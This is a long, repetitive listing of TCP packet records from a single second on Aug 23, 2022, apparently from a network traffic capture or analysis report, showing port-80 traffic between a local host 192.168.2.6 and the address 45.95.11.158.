                                                                                                                                                                      Aug 23, 2022 18:26:10.437036037 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437051058 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437058926 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437086105 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437088966 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437109947 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437133074 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437134027 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437139988 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437158108 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437177896 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437180996 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437184095 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437202930 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437205076 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437228918 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437239885 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437244892 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437252998 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437261105 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437278032 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437289953 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437300920 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437324047 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437336922 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437344074 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437350988 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437367916 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437376022 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437400103 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437412024 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437417984 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437423944 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437438965 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437448978 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437474966 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437486887 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437494040 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437499046 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437524080 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437531948 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437537909 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437551022 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437565088 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437575102 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437597990 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437602043 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437608004 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437623024 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437644958 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437653065 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437659979 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437669992 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437700987 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437706947 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437746048 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437771082 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437792063 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437793970 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437813044 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437820911 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437844992 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437849045 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437854052 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437868118 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437882900 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437894106 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437916994 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437930107 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437937021 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437942982 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437967062 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.437973022 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.437979937 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438020945 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438039064 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438107014 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438107967 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438131094 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438153982 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438159943 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438174963 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438189983 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438214064 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438226938 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438232899 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438240051 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438263893 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438276052 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438282967 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438291073 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438314915 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438334942 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438338041 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438339949 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438363075 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438374996 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438380957 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438386917 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438410044 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438424110 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438430071 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438435078 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438460112 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438472986 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438478947 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438483953 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438508034 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438519955 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438525915 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438549042 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438585997 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438590050 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438592911 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438630104 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438652992 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438667059 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438673019 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438677073 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438700914 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438714027 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438719988 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438725948 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438762903 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438762903 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438769102 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438793898 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438826084 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438832045 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438838005 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438858032 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438888073 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438899040 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438905001 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438920975 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438952923 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.438956976 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438961983 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.438983917 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439016104 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439023018 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439029932 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439047098 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439060926 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439076900 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439090014 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439109087 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439129114 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439138889 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439168930 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439174891 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439181089 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439199924 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439224005 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439230919 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439264059 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439269066 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439276934 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439294100 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439322948 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439331055 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439337969 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439385891 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439424038 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439428091 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439435005 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439455986 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439461946 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439487934 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439507008 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439519882 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439552069 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439560890 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439568996 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439584017 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439614058 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439631939 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439641953 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439646006 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439676046 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439686060 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439692974 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439707041 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439723015 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439738035 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439752102 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439779043 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439799070 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439805031 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439817905 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439835072 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439862013 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439897060 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439914942 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439919949 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439929008 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439949036 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.439960003 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.439990044 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440000057 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440006971 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440021992 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440052986 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440066099 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440073013 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440084934 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440116882 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440120935 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440145969 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440165043 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440172911 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440179110 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440202951 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440234900 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440268040 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440299034 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440314054 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440320969 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440325975 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440331936 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440362930 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440382004 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440388918 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440392971 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440424919 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440437078 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440443039 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440458059 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440490961 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440505981 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440512896 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440524101 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440536976 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440555096 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440587044 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440587044 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440618992 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440627098 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440637112 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440649986 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440665960 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440681934 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440712929 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440743923 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440746069 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440752029 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440777063 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440778017 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440807104 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440823078 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440845013 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440860033 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440866947 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440884113 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440917969 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440946102 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440948009 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.440953016 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440957069 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.440982103 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.441010952 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.441025972 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.441045046 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.441046953 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.441077948 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.441098928 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.441107035 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.441109896 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.441143036 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.441162109 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.441168070 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.441174984 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.441205025 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.441226959 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.441235065 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.441237926 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.441252947 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.441267967 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.441292048 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.441298962 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.441312075 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.441329956 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.441360950 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.441365957 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.441371918 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.441394091 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.441423893 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.441431046 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.441437960 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.441454887 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.441484928 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:10.441494942 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.441502094 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:10.441514969 CEST804980045.95.11.158192.168.2.6
